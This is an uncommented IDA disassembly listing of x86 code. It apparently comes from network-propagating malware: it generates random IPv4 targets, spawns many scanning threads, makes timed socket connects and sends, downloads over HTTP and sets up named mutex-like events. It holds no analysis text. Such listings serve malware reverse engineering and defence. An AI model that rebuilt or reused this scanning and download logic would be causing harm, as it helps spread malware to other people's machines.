mov [ebp+var_210], ebx
mov [ebp+var_108], esi
mov [ebp+var_10C], ebx
mov [ebp+var_4], eax
call dword_9A124C ; select
cmp eax, ebx
jl short loc_9A8378
lea eax, [ebp+var_10C]
push eax
push esi
call sub_9B34C0 ; __WSAFDIsSet
test eax, eax
jnz short loc_9A8378
push eax
mov eax, [ebp+arg_8]
sub eax, edi
push eax
mov eax, [ebp+arg_4]
add eax, edi
push eax
push esi
call dword_9A1270 ; send
cmp eax, 0FFFFFFFFh
jz short loc_9A8373
add edi, eax
cmp edi, [ebp+arg_8]
jl short loc_9A82FA
loc_9A836C: ; CODE XREF: sub_9A82E1+11�j
mov eax, edi
loc_9A836E: ; CODE XREF: sub_9A82E1+95�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9A8373: ; CODE XREF: sub_9A82E1+82�j
; sub_9A82E1+A2�j
or eax, 0FFFFFFFFh
jmp short loc_9A836E
; ---------------------------------------------------------------------------
loc_9A8378: ; CODE XREF: sub_9A82E1+58�j
; sub_9A82E1+69�j
push 274Ch
call dword_9A12A0 ; WSASetLastError
jmp short loc_9A8373
sub_9A82E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8385 proc near ; CODE XREF: sub_9ABADB+40�p
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 228h
and [ebp+var_8], 0
push ebx
push esi
push edi
push 10h
xor esi, esi
lea eax, [ebp+var_20]
push 0
inc esi
push eax
mov [ebp+var_4], esi
call sub_9B3240 ; memset
mov eax, [ebp+arg_4]
add esp, 0Ch
push [ebp+arg_8]
mov [ebp+var_20], 2
mov [ebp+var_1C], eax
call dword_9A1294 ; ntohs
mov edi, [ebp+arg_0]
mov ebx, dword_9A1254
mov [ebp+var_1E], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push edi
call ebx ; dword_9A1254
push 10h
lea eax, [ebp+var_20]
push eax
push edi
call dword_9A1298 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_9A83F8
call dword_9A129C ; WSAGetLastError
cmp eax, 2733h
jnz short loc_9A8469
loc_9A83F8: ; CODE XREF: sub_9A8385+64�j
mov eax, [ebp+arg_C]
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_228]
push ecx
lea ecx, [ebp+var_124]
mov [ebp+var_10], eax
xor eax, eax
push ecx
push eax
push eax
mov [ebp+var_120], edi
mov [ebp+var_124], esi
mov [ebp+var_224], edi
mov [ebp+var_228], esi
mov [ebp+var_C], eax
call dword_9A124C ; select
mov [ebp+arg_4], eax
lea eax, [ebp+var_8]
push eax
push 8004667Eh
push edi
call ebx ; dword_9A1254
cmp [ebp+arg_4], esi
jl short loc_9A845E
lea eax, [ebp+var_124]
push eax
push edi
call sub_9B34C0 ; __WSAFDIsSet
test eax, eax
jz short loc_9A845E
xor eax, eax
jmp short loc_9A846C
; ---------------------------------------------------------------------------
loc_9A845E: ; CODE XREF: sub_9A8385+C2�j
; sub_9A8385+D3�j
push 274Ch
call dword_9A12A0 ; WSASetLastError
loc_9A8469: ; CODE XREF: sub_9A8385+71�j
or eax, 0FFFFFFFFh
loc_9A846C: ; CODE XREF: sub_9A8385+D7�j
pop edi
pop esi
pop ebx
leave
retn
sub_9A8385 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8471 proc near ; CODE XREF: sub_9A728D+62�p
; sub_9A85C8+B�p ...
var_424 = byte ptr -424h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 424h
mov eax, [ebp+arg_4]
push ebx
push esi
xor ebx, ebx
push edi
mov [eax], ebx
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_424]
push eax
mov esi, 400h
push ebx
mov [ebp+var_10], esi
call sub_9B34D2
mov eax, 10000h
push eax
push 40h
mov [ebp+var_14], eax
call dword_9A10C0 ; GlobalAlloc
mov edi, eax
cmp edi, ebx
jz loc_9A85AD
push ebx
push ebx
push ebx
push ebx
lea eax, [ebp+var_424]
push eax
call dword_9A1230
cmp eax, ebx
mov [ebp+var_20], eax
jz loc_9A85AD
push ebx
push 84080300h
push ebx
push ebx
push [ebp+arg_0]
push eax
call dword_9A1244
cmp eax, ebx
mov [ebp+var_C], eax
jz loc_9A85A4
lea ecx, [ebp+var_1C]
push ecx
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_18]
push ecx
push 20000013h
push eax
mov [ebp+var_18], 1F4h
mov [ebp+var_1C], ebx
mov [ebp+var_10], 4
call dword_9A1234
test eax, eax
jz short loc_9A859B
cmp [ebp+var_18], 0C8h
jnz short loc_9A859B
lea eax, [ebp+var_8]
push eax
push esi
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
push edi
jmp short loc_9A8582
; ---------------------------------------------------------------------------
loc_9A8535: ; CODE XREF: sub_9A8471+11C�j
mov eax, [ebp+var_8]
add [ebp+var_4], eax
mov eax, [ebp+var_14]
cmp [ebp+var_4], eax
jnz short loc_9A8572
lea ebx, [eax+eax]
push ebx
push 40h
call dword_9A10C0 ; GlobalAlloc
test eax, eax
mov [ebp+var_24], eax
jz short loc_9A8591
push [ebp+var_14]
push edi
push eax
call sub_9B323A ; memcpy
add esp, 0Ch
push edi
call dword_9A10BC ; GlobalFree
mov edi, [ebp+var_24]
mov [ebp+var_14], ebx
xor ebx, ebx
loc_9A8572: ; CODE XREF: sub_9A8471+D0�j
cmp [ebp+var_8], esi
jb short loc_9A8593
lea eax, [ebp+var_8]
push eax
mov eax, [ebp+var_4]
push esi
add eax, edi
push eax
loc_9A8582: ; CODE XREF: sub_9A8471+C2�j
push [ebp+var_C]
call dword_9A1238
test eax, eax
jnz short loc_9A8535
jmp short loc_9A8593
; ---------------------------------------------------------------------------
loc_9A8591: ; CODE XREF: sub_9A8471+E3�j
xor ebx, ebx
loc_9A8593: ; CODE XREF: sub_9A8471+104�j
; sub_9A8471+11E�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov [ecx], eax
loc_9A859B: ; CODE XREF: sub_9A8471+AB�j
; sub_9A8471+B4�j
push [ebp+var_C]
call dword_9A123C
loc_9A85A4: ; CODE XREF: sub_9A8471+7A�j
push [ebp+var_20]
call dword_9A123C
loc_9A85AD: ; CODE XREF: sub_9A8471+41�j
; sub_9A8471+5D�j
mov eax, [ebp+arg_4]
cmp [eax], ebx
jnz short loc_9A85C1
cmp edi, ebx
jz short loc_9A85C1
push edi
call dword_9A10BC ; GlobalFree
xor edi, edi
loc_9A85C1: ; CODE XREF: sub_9A8471+141�j
; sub_9A8471+145�j
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_9A8471 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A85C8 proc near ; CODE XREF: sub_9A986A+46�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_9A8471
test eax, eax
pop ecx
pop ecx
jz short loc_9A85F0
push eax
call dword_9A10BC ; GlobalFree
cmp [ebp+var_4], 0
jz short loc_9A85F0
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_9A85F0: ; CODE XREF: sub_9A85C8+14�j
; sub_9A85C8+21�j
xor eax, eax
leave
retn
sub_9A85C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A85F4 proc near ; DATA XREF: sub_9A870B+6A�o
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
call sub_9A7F51
mov edi, [ebp+arg_0]
push dword ptr [edi+10h]
lea eax, [ebp+var_C]
push dword ptr [edi+4]
push eax
lea eax, [ebp+var_8]
push eax
call sub_9A7364
add esp, 10h
test eax, eax
jz loc_9A8704
push ebx
push esi
mov esi, dword_9A1074
push 0
push dword ptr [edi]
call esi ; dword_9A1074
mov ebx, 102h
jmp loc_9A86F5
; ---------------------------------------------------------------------------
loc_9A8639: ; CODE XREF: sub_9A85F4+5D�j
; sub_9A85F4+63�j ...
call dword_9A11D8 ; rand
mov word ptr [ebp+arg_0], ax
call dword_9A11D8 ; rand
cmp byte ptr [ebp+arg_0], 0Bh
mov word ptr [ebp+arg_0+2], ax
jb short loc_9A8639
cmp byte ptr [ebp+arg_0], 0F0h
ja short loc_9A8639
cmp byte ptr [ebp+arg_0+1], 0FEh
ja short loc_9A8639
cmp al, 0FEh
ja short loc_9A8639
cmp byte ptr [ebp+arg_0+3], 1
jb short loc_9A8639
cmp byte ptr [ebp+arg_0+3], 0FEh
ja short loc_9A8639
push [ebp+arg_0]
call sub_9A7DF7
test eax, eax
pop ecx
jz short loc_9A8639
push [ebp+arg_0]
call sub_9A7DCA
test eax, eax
pop ecx
jz short loc_9A8639
mov eax, [ebp+arg_0]
cmp eax, [edi+4]
jz short loc_9A86A0
push [ebp+var_C]
push [ebp+var_8]
push eax
call sub_9A78CC
add esp, 0Ch
loc_9A86A0: ; CODE XREF: sub_9A85F4+9B�j
mov eax, dword_9B5600
neg eax
sbb eax, eax
and eax, 1194h
add eax, 1F4h
push eax
push dword ptr [edi]
call esi ; WaitForSingleObject
cmp eax, ebx
jnz short loc_9A86DF
loc_9A86BC: ; CODE XREF: sub_9A85F4+103�j
lea eax, [ebp+var_4]
push 0
push eax
call dword_9A1240
test eax, eax
jnz loc_9A8639
jmp short loc_9A86DF
; ---------------------------------------------------------------------------
loc_9A86D2: ; CODE XREF: sub_9A85F4+F9�j
push 3E8h
push dword ptr [edi]
call esi ; WaitForSingleObject
cmp eax, ebx
jnz short loc_9A86EF
loc_9A86DF: ; CODE XREF: sub_9A85F4+C6�j
; sub_9A85F4+DC�j
lea eax, [ebp+var_4]
push 0
push eax
call dword_9A1240
test eax, eax
jz short loc_9A86D2
loc_9A86EF: ; CODE XREF: sub_9A85F4+E9�j
push 0
push dword ptr [edi]
call esi ; WaitForSingleObject
loc_9A86F5: ; CODE XREF: sub_9A85F4+40�j
cmp eax, ebx
jz short loc_9A86BC
push [ebp+var_8]
call dword_9A10BC ; GlobalFree
pop esi
pop ebx
loc_9A8704: ; CODE XREF: sub_9A85F4+27�j
xor eax, eax
pop edi
leave
retn 4
sub_9A85F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A870B proc near ; DATA XREF: sub_9A8A08+35D�o
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
call sub_9A7F51
mov esi, dword_9A1240
xor ebx, ebx
push ebx
lea eax, [ebp+var_4]
push eax
call esi ; dword_9A1240
mov edi, [ebp+arg_0]
jmp short loc_9A8747
; ---------------------------------------------------------------------------
loc_9A872C: ; CODE XREF: sub_9A870B+3E�j
push 3E8h
push dword ptr [edi]
call dword_9A1074 ; WaitForSingleObject
cmp eax, 102h
jnz short loc_9A879F
push ebx
lea eax, [ebp+var_4]
push eax
call esi ; dword_9A1240
loc_9A8747: ; CODE XREF: sub_9A870B+1F�j
test eax, eax
jz short loc_9A872C
mov eax, [ebp+var_4]
mov esi, dword_9A10E8
and eax, 1
mov dword_9B5600, eax
neg eax
sbb eax, eax
and eax, 0FFFFFF88h
add eax, 96h
cmp eax, ebx
jle short loc_9A878A
mov [ebp+arg_0], eax
loc_9A876F: ; CODE XREF: sub_9A870B+7D�j
lea eax, [ebp+var_8]
push eax
push ebx
push edi
push offset sub_9A85F4
push ebx
push ebx
call dword_9A10EC ; CreateThread
push eax
call esi ; dword_9A10E8
dec [ebp+arg_0]
jnz short loc_9A876F
loc_9A878A: ; CODE XREF: sub_9A870B+5F�j
push 0FFFFFFFFh
push dword ptr [edi]
call dword_9A1074 ; WaitForSingleObject
push dword ptr [edi]
call esi ; dword_9A10E8
push edi
call dword_9A10BC ; GlobalFree
loc_9A879F: ; CODE XREF: sub_9A870B+33�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_9A870B endp
; =============== S U B R O U T I N E =======================================
sub_9A87A8 proc near ; DATA XREF: sub_9A88D6+FF�o
; sub_9A8A08+203�o
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 4
sub esp, 0Ch
push ebx
push ebp
push esi
push edi
call sub_9A7F51
mov esi, [esp+1Ch+arg_0]
mov edi, dword_9A1074
mov ebx, 102h
loc_9A87C3: ; CODE XREF: sub_9A87A8+10D�j
push dword ptr [esi+10h]
mov eax, [esi+8]
push dword ptr [esi+4]
mov [esp+24h+var_C], eax
lea eax, [esp+24h+var_4]
push eax
lea eax, [esp+28h+var_8]
push eax
call sub_9A7364
add esp, 10h
test eax, eax
jz loc_9A8875
xor ebp, ebp
push ebp
jmp short loc_9A8863
; ---------------------------------------------------------------------------
loc_9A87EF: ; CODE XREF: sub_9A87A8+C1�j
cmp ebp, [esi+0Ch]
jnb short loc_9A886B
jmp short loc_9A8830
; ---------------------------------------------------------------------------
loc_9A87F6: ; CODE XREF: sub_9A87A8+97�j
cmp ebp, [esi+0Ch]
jnb short loc_9A8850
push [esp+1Ch+var_C]
call sub_9B34BA ; ntohl
inc eax
push eax
call sub_9B34C6 ; ntohl
cmp eax, [esi+4]
mov [esp+1Ch+var_C], eax
jz short loc_9A8825
push dword ptr [esp+1Ch+var_4]
push dword ptr [esp+20h+var_8]
push eax
call sub_9A78CC
add esp, 0Ch
loc_9A8825: ; CODE XREF: sub_9A87A8+6A�j
push 50h
push dword ptr [esi]
call edi ; dword_9A1074
cmp eax, ebx
jnz short loc_9A8850
inc ebp
loc_9A8830: ; CODE XREF: sub_9A87A8+4C�j
lea eax, [esp+1Ch+arg_0]
push 0
push eax
call dword_9A1240
test eax, eax
jnz short loc_9A87F6
jmp short loc_9A8850
; ---------------------------------------------------------------------------
loc_9A8843: ; CODE XREF: sub_9A87A8+B7�j
push 3E8h
push dword ptr [esi]
call edi ; dword_9A1074
cmp eax, ebx
jnz short loc_9A8861
loc_9A8850: ; CODE XREF: sub_9A87A8+51�j
; sub_9A87A8+85�j ...
lea eax, [esp+1Ch+arg_0]
push 0
push eax
call dword_9A1240
test eax, eax
jz short loc_9A8843
loc_9A8861: ; CODE XREF: sub_9A87A8+A6�j
push 0
loc_9A8863: ; CODE XREF: sub_9A87A8+45�j
push dword ptr [esi]
call edi ; dword_9A1074
cmp eax, ebx
jz short loc_9A87EF
loc_9A886B: ; CODE XREF: sub_9A87A8+4A�j
push dword ptr [esp+1Ch+var_8]
call dword_9A10BC ; GlobalFree
loc_9A8875: ; CODE XREF: sub_9A87A8+3C�j
cmp dword ptr [esi+14h], 0
jz short loc_9A8886
push offset dword_9B560C
call dword_9A1070 ; InterlockedDecrement
loc_9A8886: ; CODE XREF: sub_9A87A8+D1�j
push 36EE80h
push dword ptr [esi]
call edi ; dword_9A1074
cmp eax, ebx
jnz short loc_9A88BB
cmp dword ptr [esi+14h], 0
jnz short loc_9A88BB
call dword_9A11D8 ; rand
push 1Eh
pop ecx
cdq
idiv ecx
add edx, 3Ch
imul edx, 0EA60h
push edx
push dword ptr [esi]
call edi ; dword_9A1074
cmp eax, ebx
jz loc_9A87C3
loc_9A88BB: ; CODE XREF: sub_9A87A8+E9�j
; sub_9A87A8+EF�j
push dword ptr [esi]
call dword_9A10E8 ; CloseHandle
push esi
call dword_9A10BC ; GlobalFree
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 0Ch
retn 4
sub_9A87A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A88D6 proc near ; CODE XREF: sub_9ABD83+321�p
var_2C = byte ptr -2Ch
var_D = byte ptr -0Dh
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
push [ebp+arg_4]
call sub_9A7DCA
test eax, eax
pop ecx
jnz short loc_9A88F8
mov eax, dword_9B5604
mov [ebp+arg_4], eax
mov eax, dword_9B5608
jmp short loc_9A88FD
; ---------------------------------------------------------------------------
loc_9A88F8: ; CODE XREF: sub_9A88D6+11�j
mov eax, dword_9B562C
loc_9A88FD: ; CODE XREF: sub_9A88D6+20�j
push esi
mov esi, [ebp+arg_0]
push esi
mov [ebp+var_8], eax
call sub_9A7DF7
test eax, eax
pop ecx
jz loc_9A8A05
push [ebp+arg_4]
call sub_9A7DF7
test eax, eax
pop ecx
jz loc_9A8A05
push esi
call sub_9A7DCA
test eax, eax
pop ecx
jz loc_9A8A05
push [ebp+arg_4]
call sub_9A7DCA
test eax, eax
pop ecx
jz loc_9A8A05
mov al, byte ptr [ebp+arg_0+2]
push ebx
xor ebx, ebx
cmp al, 0Ah
mov [ebp+var_4], esi
jb short loc_9A8958
sub al, 0Ah
mov byte ptr [ebp+var_4+2], al
jmp short loc_9A895B
; ---------------------------------------------------------------------------
loc_9A8958: ; CODE XREF: sub_9A88D6+79�j
mov byte ptr [ebp+var_4+2], bl
loc_9A895B: ; CODE XREF: sub_9A88D6+80�j
push edi
mov esi, 0AF5h
push esi
mov byte ptr [ebp+var_4+3], bl
push [ebp+var_4]
lea eax, [ebp+var_2C]
push [ebp+arg_4]
push offset aN08x08x08x ; "n%08x%08x%08x"
push 20h
push eax
call dword_9A11D4 ; _snprintf
add esp, 18h
lea eax, [ebp+var_2C]
push eax
push ebx
push 1
push ebx
mov [ebp+var_D], bl
call dword_9A1068 ; CreateEventA
mov edi, eax
cmp edi, ebx
jz short loc_9A8A03
call dword_9A10F0 ; RtlGetLastWin32Error
cmp eax, 0B7h
jz short loc_9A89FC
push offset dword_9B560C
call dword_9A106C ; InterlockedIncrement
cmp eax, 32h
jg short loc_9A89F1
push 18h
push 40h
call dword_9A10C0 ; GlobalAlloc
mov ecx, [ebp+arg_4]
mov [eax+4], ecx
mov ecx, [ebp+var_4]
mov [eax+8], ecx
mov ecx, [ebp+var_8]
mov [eax+10h], ecx
lea ecx, [ebp+var_C]
push ecx
push ebx
push eax
push offset sub_9A87A8
push ebx
push ebx
mov [eax], edi
mov [eax+0Ch], esi
mov dword ptr [eax+14h], 1
call dword_9A10EC ; CreateThread
push eax
jmp short loc_9A89FD
; ---------------------------------------------------------------------------
loc_9A89F1: ; CODE XREF: sub_9A88D6+DB�j
push offset dword_9B560C
call dword_9A1070 ; InterlockedDecrement
loc_9A89FC: ; CODE XREF: sub_9A88D6+CB�j
push edi
loc_9A89FD: ; CODE XREF: sub_9A88D6+119�j
call dword_9A10E8 ; CloseHandle
loc_9A8A03: ; CODE XREF: sub_9A88D6+BE�j
pop edi
pop ebx
loc_9A8A05: ; CODE XREF: sub_9A88D6+37�j
; sub_9A88D6+48�j ...
pop esi
leave
retn
sub_9A88D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_9A8A08 proc near ; DATA XREF: sub_9A8F0D+9�o
var_1850 = byte ptr -1850h
var_184C = byte ptr -184Ch
var_C50 = dword ptr -0C50h
var_C4C = dword ptr -0C4Ch
var_C48 = dword ptr -0C48h
var_50 = byte ptr -50h
var_4C = byte ptr -4Ch
var_48 = byte ptr -48h
var_29 = byte ptr -29h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov eax, 1850h
call __alloca_probe
push ebx
push esi
push edi
xor ebx, ebx
mov [ebp+var_20], ebx
xor eax, eax
lea edi, [ebp+var_1C]
stosd
stosd
call sub_9A7F51
loc_9A8A29: ; CODE XREF: sub_9A8A08+500�j
mov esi, dword_9A1240
jmp short loc_9A8A3C
; ---------------------------------------------------------------------------
loc_9A8A31: ; CODE XREF: sub_9A8A08+3D�j
push 1388h
call dword_9A10C4 ; Sleep
loc_9A8A3C: ; CODE XREF: sub_9A8A08+27�j
lea eax, [ebp+var_4]
push ebx
push eax
call esi ; dword_9A1240
test eax, eax
jz short loc_9A8A31
loc_9A8A47: ; CODE XREF: sub_9A8A08+62�j
push 1388h
call dword_9A10C4 ; Sleep
lea eax, [ebp+var_C50]
push 100h
push eax
call sub_9A7E5C
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+var_C], eax
jz short loc_9A8A47
xor eax, eax
cmp [ebp+var_C], ebx
mov [ebp+var_4], eax
jbe loc_9A8C40
loc_9A8A7A: ; CODE XREF: sub_9A8A08+232�j
lea eax, [eax+eax*2]
shl eax, 2
push [ebp+eax+var_C48]
push [ebp+eax+var_C4C]
push [ebp+eax+var_C50]
lea eax, [ebp+var_48]
push offset aL08x08x08x ; "l%08x%08x%08x"
push 20h
push eax
call dword_9A11D4 ; _snprintf
add esp, 18h
lea eax, [ebp+var_48]
push eax
push ebx
push 1
push ebx
mov [ebp+var_29], bl
call dword_9A1068 ; CreateEventA
mov esi, eax
cmp esi, ebx
jz loc_9A8C30
call dword_9A10F0 ; RtlGetLastWin32Error
cmp eax, 0B7h
jz loc_9A8C29
cmp dword_9B5604, ebx
jnz loc_9A8BDD
mov eax, [ebp+var_4]
lea eax, [eax+eax*2]
push [ebp+eax*4+var_C50]
call sub_9A7DCA
test eax, eax
pop ecx
jnz loc_9A8BDD
mov eax, [ebp+var_4]
lea eax, [eax+eax*2]
push [ebp+eax*4+var_C50]
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_28]
push eax
call sub_9A6FD2
add esp, 0Ch
test eax, eax
jz loc_9A8BDD
mov eax, [ebp+var_4]
mov ecx, [ebp+var_28]
lea eax, [eax+eax*2]
cmp ecx, [ebp+eax*4+var_C50]
jnz loc_9A8BDD
push [ebp+var_10]
call sub_9A7DF7
test eax, eax
pop ecx
jz loc_9A8BDD
push [ebp+var_10]
call sub_9A7DCA
test eax, eax
pop ecx
jz loc_9A8BDD
xor ecx, ecx
lea eax, [ebp+var_C50]
loc_9A8B61: ; CODE XREF: sub_9A8A08+167�j
mov edx, [eax]
cmp edx, [ebp+var_10]
jz short loc_9A8BDD
inc ecx
add eax, 0Ch
cmp ecx, [ebp+var_C]
jb short loc_9A8B61
push ebx
lea eax, [ebp+var_8]
push eax
xor eax, eax
mov ax, word ptr dword_9B562C
mov [ebp+var_8], ebx
push eax
call sub_9A7077
add esp, 0Ch
test eax, eax
jz short loc_9A8BDD
cmp word ptr [ebp+var_8], bx
jz short loc_9A8BDD
push [ebp+var_8]
push [ebp+var_10]
call sub_9AC384
test eax, eax
pop ecx
pop ecx
jz short loc_9A8BDD
mov eax, [ebp+var_4]
lea eax, [eax+eax*2]
shl eax, 2
mov ecx, [ebp+eax+var_C50]
mov [ebp+var_20], ecx
mov ecx, [ebp+eax+var_C4C]
mov eax, [ebp+eax+var_C48]
mov [ebp+var_18], eax
movzx eax, word ptr [ebp+var_8]
mov dword_9B5608, eax
mov eax, [ebp+var_10]
mov [ebp+var_1C], ecx
mov dword_9B5604, eax
loc_9A8BDD: ; CODE XREF: sub_9A8A08+D3�j
; sub_9A8A08+EE�j ...
push 18h
push 40h
call dword_9A10C0 ; GlobalAlloc
mov [eax], esi
mov ecx, [ebp+var_4]
lea esi, [ecx+ecx*2]
lea esi, [ebp+esi*4+var_C50]
lea edi, [eax+4]
movsd
movsd
movsd
mov ecx, dword_9B562C
mov [eax+10h], ecx
lea ecx, [ebp+var_50]
push ecx
push ebx
push eax
push offset sub_9A87A8
push ebx
push ebx
call dword_9A10EC ; CreateThread
push eax
call dword_9A10E8 ; CloseHandle
push 32h
call dword_9A10C4 ; Sleep
jmp short loc_9A8C30
; ---------------------------------------------------------------------------
loc_9A8C29: ; CODE XREF: sub_9A8A08+C7�j
push esi
call dword_9A10E8 ; CloseHandle
loc_9A8C30: ; CODE XREF: sub_9A8A08+B6�j
; sub_9A8A08+21F�j
mov eax, [ebp+var_4]
inc eax
cmp eax, [ebp+var_C]
mov [ebp+var_4], eax
jb loc_9A8A7A
loc_9A8C40: ; CODE XREF: sub_9A8A08+6C�j
cmp dword_9B5604, ebx
jnz loc_9A8CFC
call sub_9A728D
mov esi, eax
push esi
call sub_9A7DF7
test eax, eax
pop ecx
jz short loc_9A8C69
push esi
call sub_9A7DCA
test eax, eax
pop ecx
jnz short loc_9A8C6B
loc_9A8C69: ; CODE XREF: sub_9A8A08+254�j
xor esi, esi
loc_9A8C6B: ; CODE XREF: sub_9A8A08+25F�j
xor eax, eax
cmp [ebp+var_C], ebx
mov [ebp+var_4], eax
jbe short loc_9A8CF0
loc_9A8C75: ; CODE XREF: sub_9A8A08+2AD�j
lea eax, [eax+eax*2]
push [ebp+eax*4+var_C50]
call sub_9A7DCA
test eax, eax
pop ecx
jz short loc_9A8CAB
mov eax, [ebp+var_4]
lea ecx, [eax+eax*2]
mov ecx, [ebp+ecx*4+var_C50]
cmp ecx, esi
jz short loc_9A8C9E
cmp esi, ebx
jnz short loc_9A8CAE
loc_9A8C9E: ; CODE XREF: sub_9A8A08+290�j
push ebx
push ecx
call sub_9AC384
test eax, eax
pop ecx
pop ecx
jnz short loc_9A8CB9
loc_9A8CAB: ; CODE XREF: sub_9A8A08+27F�j
mov eax, [ebp+var_4]
loc_9A8CAE: ; CODE XREF: sub_9A8A08+294�j
inc eax
cmp eax, [ebp+var_C]
mov [ebp+var_4], eax
jb short loc_9A8C75
jmp short loc_9A8CF0
; ---------------------------------------------------------------------------
loc_9A8CB9: ; CODE XREF: sub_9A8A08+2A1�j
mov eax, [ebp+var_4]
lea eax, [eax+eax*2]
shl eax, 2
mov ecx, [ebp+eax+var_C50]
mov edx, [ebp+eax+var_C4C]
mov eax, [ebp+eax+var_C48]
mov [ebp+var_18], eax
mov eax, dword_9B562C
mov [ebp+var_20], ecx
mov [ebp+var_1C], edx
mov dword_9B5608, eax
mov dword_9B5604, ecx
loc_9A8CF0: ; CODE XREF: sub_9A8A08+26B�j
; sub_9A8A08+2AF�j
cmp dword_9B5604, ebx
jz loc_9A8D8A
loc_9A8CFC: ; CODE XREF: sub_9A8A08+23E�j
push ebx
push dword_9B5608
lea eax, [ebp+var_48]
push dword_9B5604
push offset aW08x08x08x ; "w%08x%08x%08x"
push 20h
push eax
call dword_9A11D4 ; _snprintf
add esp, 18h
lea eax, [ebp+var_48]
push eax
push ebx
push 1
push ebx
mov [ebp+var_29], bl
call dword_9A1068 ; CreateEventA
mov esi, eax
cmp esi, ebx
jz short loc_9A8D8A
call dword_9A10F0 ; RtlGetLastWin32Error
cmp eax, 0B7h
jz short loc_9A8D83
push 18h
push 40h
call dword_9A10C0 ; GlobalAlloc
mov [eax], esi
mov ecx, dword_9B5604
mov [eax+4], ecx
mov ecx, dword_9B5608
mov [eax+10h], ecx
lea ecx, [ebp+var_4C]
push ecx
push ebx
push eax
push offset sub_9A870B
push ebx
push ebx
call dword_9A10EC ; CreateThread
push eax
call dword_9A10E8 ; CloseHandle
push 32h
call dword_9A10C4 ; Sleep
jmp short loc_9A8D8A
; ---------------------------------------------------------------------------
loc_9A8D83: ; CODE XREF: sub_9A8A08+337�j
push esi
call dword_9A10E8 ; CloseHandle
loc_9A8D8A: ; CODE XREF: sub_9A8A08+2EE�j
; sub_9A8A08+32A�j ...
mov [ebp+var_14], 1
loc_9A8D91: ; CODE XREF: sub_9A8A08+4FA�j
push 2710h
call dword_9A10C4 ; Sleep
lea eax, [ebp+var_1850]
push 100h
push eax
call sub_9A7E5C
cmp eax, [ebp+var_C]
pop ecx
pop ecx
mov [ebp+var_24], eax
jz short loc_9A8DBA
mov [ebp+var_14], ebx
loc_9A8DBA: ; CODE XREF: sub_9A8A08+3AD�j
xor eax, eax
cmp [ebp+var_C], ebx
mov [ebp+var_4], eax
jbe loc_9A8EFF
loc_9A8DC8: ; CODE XREF: sub_9A8A08+4F1�j
cmp [ebp+var_24], ebx
mov [ebp+var_8], ebx
jbe short loc_9A8E11
lea ecx, [eax+eax*2]
shl ecx, 2
mov esi, [ebp+ecx+var_C50]
lea edx, [ebp+var_184C]
loc_9A8DE3: ; CODE XREF: sub_9A8A08+407�j
cmp [edx-4], esi
jnz short loc_9A8E03
mov edi, [edx]
cmp edi, [ebp+ecx+var_C4C]
jnz short loc_9A8E03
mov edi, [edx+4]
cmp edi, [ebp+ecx+var_C48]
jz loc_9A8EF2
loc_9A8E03: ; CODE XREF: sub_9A8A08+3DE�j
; sub_9A8A08+3E9�j
mov edi, [ebp+var_24]
inc [ebp+var_8]
add edx, 0Ch
cmp [ebp+var_8], edi
jb short loc_9A8DE3
loc_9A8E11: ; CODE XREF: sub_9A8A08+3C6�j
lea eax, [eax+eax*2]
shl eax, 2
push [ebp+eax+var_C48]
push [ebp+eax+var_C4C]
push [ebp+eax+var_C50]
lea eax, [ebp+var_48]
push offset aL08x08x08x ; "l%08x%08x%08x"
push 20h
push eax
